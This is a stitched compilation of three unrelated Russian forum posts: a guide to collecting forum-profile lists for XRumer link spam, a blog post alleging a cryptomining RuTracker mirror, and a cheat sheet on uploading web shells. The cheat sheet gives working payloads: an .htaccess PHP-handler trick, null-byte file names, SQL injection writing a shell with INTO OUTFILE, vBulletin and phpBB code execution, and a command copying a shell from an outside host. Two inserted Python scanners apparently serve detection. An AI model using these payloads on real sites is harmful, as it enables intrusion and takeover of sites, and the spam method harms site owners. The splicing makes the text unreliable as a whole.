A tricky way to collect a high-quality working database for XRumer

Hi all! It's no secret that however wonderful the software for mass registration/mailing is, it has almost no value without good-quality databases. Databases can be obtained in different ways: parse them yourself, buy them, find them in public, etc. Each option is good in its own way and each has its own pros and cons.

Public database. The main advantage is that it is free. Purchased databases often leak into the public too, so you can still find worthwhile ones. The catch is that a large number of webmasters will work on these databases at once (both from individuals and from broken people), so they quickly turn into a trash heap, and as you know, 1 trust link is often better than 1000 from shitty sites.
Buying a database. It's basically a lottery. There are plenty of sellers now, but there are even more hucksters who buy and resell databases, passing them off as their own. This way of obtaining a database is good if you value your time and buy from a time-tested person.
Self-parsing. The best, but at the same time expensive option. For successful parsing you need a dictionary on the topic, features for parsing, and fresh proxies/SOCKS if you plan to parse Google, for example. Of course, you also need the parser itself. For XRumer this is simpler, since XRumer comes with Hrefer, but I still recommend buying something extra. Personally, I use webparser, although many praise a-parser; in general, it depends on who is good at what and who has what needs.

A database you collect yourself gives a slight temporary advantage over other webmasters, but do not think that if you collect, say, a database of forums based on good features, you will not find spam from “brothers in arms” on a good half of them. In any case, freshly scraped (raw) databases will be better than public ones and often better than purchased ones, but, as they say, this option is for those who have good hardware and time.

There are, of course, other options - steal from someone else’s server, parse the Internet using something like this request

Example of a lot in telderi:
_http://www.telderi.ru/ru/viewsite/67448
As we can see: “also run through profiles, run through profiles and catalogs was carried out 30 days ago,” which means this is “our client.” Copy the site URL to your text file.

In this simple way, we collect a database of sites that have at some point been run through trust sites, either with XRumer or manually. Note that most runners work with the default XRumer without a modified xas_AI.txt file, which again works to our advantage.

In literally an hour, you can collect about 200 website URLs that were “stained” by a direct XRumer run. Next, we top up the collection on SEO forums: there we look for topics offering runs and read the reviews. There are plenty of such forums, for example:
_http://www.maultalk.com/forum38.html
Next, we go through the popular threads of the providers and look in the threads of those who left reviews about the service. In 85% of cases, if they have the website field in their profile and signature filled in, then their website is there, through which they ordered a run, and often more than one.

The work of collecting such URLs is a little tedious, but the effect will be worthy (for now, take my word for it).
After 2-3 hours of work, which can be outsourced to a smart student for 100-150 rubles from , we get a decent list of sites, now it’s just a matter of getting backlinks.
First, go to _ http://ahrefs.com (you can use other software/services) and extract ALL backlinks.

It is also better to entrust this tedious work to someone.
The second stage will be preparing URLs for parsing, and here again comes a little trick.
You need to create queries for PARSING that look something like this. I’ll give an example for a website:
“View profile” https://site/
“Profile” https://site/
“User profile” https://site/
“User” https://site/
“Site” https://site/
“Home page” https://site/
"user" https://site/
"member" https://site/
"profile" https://site/

Just enter the domain name in quotes: “https://site”
Just browse the forums and see what the profiles look like there.
Excel and the & operator will help you make a list of such signs and URLs.
In one column you have the URLs, in the other our simple “signs”.


What do we get as output? A database of profiles that are 100% in the Yandex or Google index, most of which the default XRumer gets through.

With such simple signs we parse the search engines (I usually limit myself to Yandex and Google).

Of course, many duplicates will be collected this way, but the profile database will be quite high-quality and indexable. Never chase quantity: it is better to buy/collect a database of 1000 profiles that are in the index than one of 40,000 that are closed to indexing, etc.

Main part (2): In the article about I mentioned that with the help of these 3 bases you can put together a good base for XRumer and I didn’t lie to you.
First, you should download all 3 databases – ru, su, RF:

https://partner.r01.ru/ru_domains.gz

https://partner.r01.ru/su_domains.gz

https://partner.r01.ru/rf_domains.gz

Next, combine them into 1 large file with URLs. ATTENTION! This operation requires a lot of hardware capacity. If you do not have it, divide the database into pieces using KeyWordKeeper (you can download it from the link – _) and continue.

After creating a large database, we will in any case have to resort to the help of KeyWordKeeper, since everyone’s favorite EXCEL does not work well with files with more than 1,000,000 lines, so we divide our database into pieces of 900,000 each. This will result in quite a lot of files.

Now you need to turn your head on and think about which designs are most often applicable for forums.

The database already contains a decent number of forums, but forums are often created on subdomains of the main site and are not included in the database.
What do subdomains generally look like?
site.ru/forum
site.ru/talk
forum.site.ru
talk.site.ru
+ other variations. Accordingly, we need to add talk and forum to the existing URLs. This is done with the same Excel & operator; press CTRL + ENTER to apply the formula to the entire list.

Now the best part: at the end of the working day, we compile everything we have done into 1 large file, shuffle it and launch XRumer in the “registration only” mode.

Given that the database is raw and many of the resources simply do not exist (we only assume that there are subdomains with forums there), with 100 threads and a 6 megabit channel the speed will be about 1200-1600 links (a lot also depends on the hardware). Those with better hardware and a better channel will run through this database in a couple of days; for the rest it will take a little over a week. The second step is to start editing the profile.

As a result, you get a ~65% Russian-language database of profiles, consisting of ~8000-9000 resources (I got about that many), where a link like “https://site/” is simply inserted; links that are active and not closed to indexing will be 3-4 times fewer. This method collects not only forum profiles, but also profiles on the DLE engine, etc. If you approach the matter thoroughly (find many sites and do several runs to squeeze the maximum out of the database), you can squeeze out another 15-20% of resources on top.

The method can be upgraded and used to collect resources of any type. The article is primarily intended for beginners who are just learning how to assemble databases, and it allows you to assemble, in 1 day of preparation, a database that can be used for several months.

Those who don’t want to bother with this can buy from me a personal database of 13,000 profiles, collected using this method with the addition of resources from YAK and DMOZ + other sources (I haven’t decided on the price tag yet, but if there is demand, I think 20-25 WMZ is quite a reasonable price).

I hope the article was useful to you. I apologize in advance for the poor preview of screenshots + lack of video material, I will try to improve it over time.

Have a nice day, everyone!

I wrote that when you try to log in to one of the RuTracker mirrors, you receive a message stating that this is only possible if you allow the site to perform calculations on your computer, in other words, to mine cryptocurrency.

After that, I received angry messages in the comments saying that I was really a fool, and that the mirrors I was describing did not belong to RuTracker and were in no way connected with RuTracker itself. I didn’t attach much importance to this, and in the comments to that note I asked: what about the fact that the mirror rutracker-org.appspot.com repeats not only the design of the official RuTracker website rutracker.org, but also completely repeats its contents? However, in response I heard, and I quote: "You are a fool, Volokh, and you don’t understand anything".

As befits a sane person, he begins to think about the following: If they tell me that I'm a fool, then maybe that's true? I thought so too, but it turned out that no - in this situation I’m not a fool. But first things first.

After RuTracker admins started saying in the comments that:

We have no other mirrors or “child projects”! All other RuTracker “clones” that duplicate our structure and design have nothing to do with us, their use can lead to the theft of passwords, the use of your computer for cryptocurrency mining and other troubles! Maintracker is also a fake!!

I began to think that maybe I really had got carried away and was slandering the guys from RuTracker in vain. Okay, I decided to compare comments from the official RuTracker website, rutracker.org, with comments from the RuTracker mirror rutracker-org.appspot.com, which requested permission to generate cryptocurrency. It turned out that the comments are completely identical. But no one will believe me, I decided, and wanted to take screenshots. But this idea also seemed stupid, because comments can easily be deleted and edited.

The best idea was to record a video. Let’s take a look, and then I’ll comment on what’s happening here:

Have you looked? I’ll say right away that I present the video “as it is,” that is, without editing. Therefore, it is without any comments or voiceover. So let's figure out what's going on here.

To begin with, I created a mailbox to register on the site rutracker-org.appspot.com. Yes, exactly on the site that mines cryptocurrency. Why on it and not on the official website rutracker.org? The fact is that I was faced with the task of showing that the sites rutracker-org.appspot.com and rutracker.org have one database, that is, these sites are interconnected, contrary to the statements of the RuTracker administrators.

After I opened my email, I opened the Tor browser and loaded three tabs:

1. Official website rutracker.org;

2. Mirror RuTracker rutracker-org.appspot.com;

3. Tab with an open mailbox.

After this, on the RuTracker mirror rutracker-org.appspot.com I registered (Time 00:25) and an account activation email arrived in my mailbox (Time 00:57). And here interesting dances begin, or rather creepy dances with the site administrators’ butts burning: the activation code contains a link to the tracker’s official website (Time 1:00):

https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF

This link works and leads directly to the official website rutracker.org. After I clicked on the link, the account created on the mirror rutracker-org.appspot.com was successfully activated on the official website rutracker.org (Time 1:06). Oh, the wonders of technology and the admins' miraculous thoughts. It seems that something is starting to smoke for the site administrators. Well, okay, I’m a fool, as they said, what can you expect from me. Let's go on.

After successfully activating my account, I go to the mirror rutracker-org.appspot.com and try to log in to the site (Time 1:45). After entering the captcha, I successfully log in using the created account on the “unofficial” tracker (Time 2:03). And at this moment the same notification appears (Time 2:07):

I click on the "Allow" button (Time 2:08) because otherwise I would not be able to log in. After that, I show that the personal account is empty and I have not left any comments yet (Time 2:20).

Now, in order to show the relationship between the mirror and the official website, I choose a random distribution on the site rutracker-org.appspot.com and leave a comment (Time 3:10). After that, on the official website rutracker.org I try to log in (Time 3:40) with the account created on the RuTracker mirror. And lo and behold, the login and password from the “unofficial” mirror worked on the official website (Time 4:00). Coincidence? I don't think so.

Let's go further, open the list of messages left on the tracker and what we see: a familiar distribution in the list of topics (Time 4:05). Probably also a coincidence, and for greater persuasiveness I open the comment I left on this distribution on a mirror not recognized by the admins (Time 4:17).

Comparing the comment on the distribution on the sites rutracker-org.appspot.com and rutracker.org (Time 5.54), we are once again convinced that these two sites are interconnected.

What did the site administrators write to me? It seems they were convincing me that the official website and the mirror rutracker-org.appspot.com are not interconnected in any way. The comments of the tracker admins clearly state that all mirrors simply duplicate the structure and design of the site, but are not interconnected. However, from what we saw, it turns out that the official website copies comments from some dodgy mirror? No, that's also nonsense. Where is the truth? The truth is that these two sites have one database, and there are many mirrors, some of which are recognized by the tracker administrators, while others are not recognized and are used to generate cryptocurrency.

It turns out that all this time, in the comments they were trying to pour some nonsense into my ears and convince me that I allegedly went to a completely wrong site, but in fact it turned out that this site also belongs to RuTracker.

I suspect that now some people will begin to experience inflammation of the fifth point and will be showered with threats, insults, etc. But I really already thought that it was in vain to attack the guys and they were not to blame for anything. It turned out to be completely different and the video is proof of that. As a colleague said: RuTracker - you were like a brother to me.

Hello %username% and his friends. Well, you urgently need to upload a shell to the site, well, you never know, maybe the final fee depends on it. Well, it just doesn’t work out. Here I collected a couple of examples (thanks to Tracy and others for this).

Uploading the shell through an image

You have hacked a site (of course you are only testing) with a custom admin panel... And you cannot upload a web shell, but there is an image upload that only accepts the .jpg, .gif and .png formats.
What can be done in this case?

We put the shell, with the extension .gif, into some folder with pictures, and create a .htaccess file with the contents

AddType application/x-httpd-php .gif
This directive makes the server handle .gif files as PHP.
Try to open /shell.gif

Also, if the script is not indifferent to line breaks, we try to upload the shell, simultaneously renaming it to shell.php%00.jpg, and check whether shell.php is available; what if?
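From the defender's side, both tricks above leave artifacts in the upload directory that are easy to sweep for. An added example (not from the original post): a Python scan that flags .htaccess files mapping a PHP handler, image files containing a PHP open tag, and file names that hide a script extension; the function names and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png"}
# Apache directives that can bind a PHP handler or MIME type to an extension.
HANDLER_RE = re.compile(
    r"^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*(php|x-httpd)", re.I | re.M)
# Only the long open tag is matched; short tags give false hits on binary data.
PHP_TAG_RE = re.compile(rb"<\?php", re.I)
# A script extension before the final extension, or before an encoded NUL.
SCRIPT_IN_NAME_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|%00)", re.I)


def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings for an upload directory."""
    findings = []
    root = Path(root)
    for path in root.rglob("*"):  # pathlib globbing includes dotfiles
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() == ".htaccess":
            if HANDLER_RE.search(path.read_text(errors="replace")):
                findings.append((rel, "htaccess maps a PHP handler"))
            continue
        if SCRIPT_IN_NAME_RE.search(path.name):
            findings.append((rel, "script extension hidden in file name"))
        if path.suffix.lower() in IMAGE_EXTS and PHP_TAG_RE.search(path.read_bytes()):
            findings.append((rel, "PHP open tag inside image file"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: one clean image and three suspicious files."""
    img = Path(root) / "img"
    img.mkdir()
    (img / "logo.gif").write_bytes(b"GIF89a" + b"\x00" * 16)
    (img / "avatar.gif").write_bytes(b"GIF89a<?php /* placeholder */ ?>")
    (img / ".htaccess").write_text("AddType application/x-httpd-php .gif\n")
    (img / "photo.php%00.jpg").write_bytes(b"\xff\xd8\xff\xe0")


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_upload_dir(tmp)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

On Apache, setting AllowOverride None for the upload directory stops a dropped .htaccess from being read at all, which removes the first finding at its source.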

Method for loading a shell via mysql.user from whine

1) Let’s find out who we are sitting under and also find out his rights to mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Let's find out who we're sitting under)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" our user "+--+
(Let's check the privileges of our user. If it gives an error during the output, you can hex our user 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Path to file "+--+
(Upload the mini-shell)
P.S.
For everything to work, you need to have write rights and know the full path to the root.
You can also check write permissions like this:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+from+mysql.user+--+
If prava is displayed, then you have rights.

The following situation. We are in the admin panel of the vBulletin forum engine

Let's go:
Plugins & Products -> Plugin Manager -> Plugins & Products -> Plugin Manager -> [Add New Plugin]

Select templates. Usually we select faq_complete, select and click the Plugin is Active checkbox, set it to “Yes” and save.

localhost/forum/faq.php?cmd=phpinfo();

If phpinfo() is printed, then consider the shell to be in our hands.

Next, in phpinfo you need to find the full path to the forum (for example /home/u0000/site.ru/www/sell.php). Then we need to turn our web shell into a txt file and upload it to any website
mysite.com/shell.txt
Upload the shell with the command

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
What does this command do? It copies the contents of variable [a] to variable [b], that is, shell.txt is copied to shell.php

Loading the shell into IPB 3

Let's go:
Support->SQL Management->Running Processes->Run New Query

Code:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
You can see the full path like this:

Admin->Support
The PHP version is written at the top, and on the left is a link to PHPINFO

Shell here:
http://site.com/uploads/shell.php

Uploading the shell to phpBB 2

1. Create the ex.sql file
2. Register there

UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Where user_id=2 is the administrator ID

3. Go to the admin panel
4. In the admin panel, select the “Restore DB” item and download ex.sql
5. Execute the code / Fill the shell like this

Let's go:
http://target/profile.php?mode=editprofile&e=phpinfo();
After:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
To display phpinfo() you need to be logged in.
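The requests in the sections above have recognizable shapes in a web server access log. An added example (not part of the original post): a Python filter that URL-decodes each request's query string and tags it by rule; the rule names, addresses and log lines are constructed, with placeholders where the post has paths.

```python
import re
from urllib.parse import unquote_plus

RULES = {
    "sqli-union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "sqli-into-outfile": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "sqli-mysql-user": re.compile(r"\bmysql\.user\b|\bfile_priv\b", re.I),
    "php-code-in-param": re.compile(
        r"=\s*(phpinfo|copy|eval|system|passthru|assert)\s*\(", re.I),
    "php-superglobal-in-param": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined format, documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1+and+1=0+union+Select+1,user(),3+--+ HTTP/1.1" 200 530
192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1+union+select+1,file_priv,3+from+mysql.user+--+ HTTP/1.1" 200 530
192.0.2.44 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?id=-1+union+select+1,2,3+into+outfile+%22PLACEHOLDER_PATH%22+--+ HTTP/1.1" 500 0
192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /forum/faq.php?cmd=phpinfo(); HTTP/1.1" 200 9000
192.0.2.44 - - [01/Jan/2024:10:01:30 +0000] "GET /forum/faq.php?cmd=copy(%24_GET%5Ba%5D,%24_GET%5Bb%5D);&a=PLACEHOLDER&b=PLACEHOLDER HTTP/1.1" 200 0
"""


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return the sorted names of the rules matched by one log line's query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = decode_fully(match.group(1).partition("?")[2])
    return sorted(name for name, rx in RULES.items() if rx.search(query))


def scan(log_text):
    """Map 1-based line numbers to matched rule names, for flagged lines only."""
    hits = {}
    for number, line in enumerate(log_text.splitlines(), 1):
        rules = classify(line)
        if rules:
            hits[number] = rules
    return hits


if __name__ == "__main__":
    for number, rules in scan(SAMPLE_LOG).items():
        print(number, ", ".join(rules))
```

The filter only sees query strings, so payloads sent in POST bodies need the same rules applied at the application or WAF layer.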

This is just a short list of how and on which engines the shell can be loaded. Need more? Welcome to the guys at rdot
uploading to forums
filling on cms
And here is my favorite shell, also on rdot))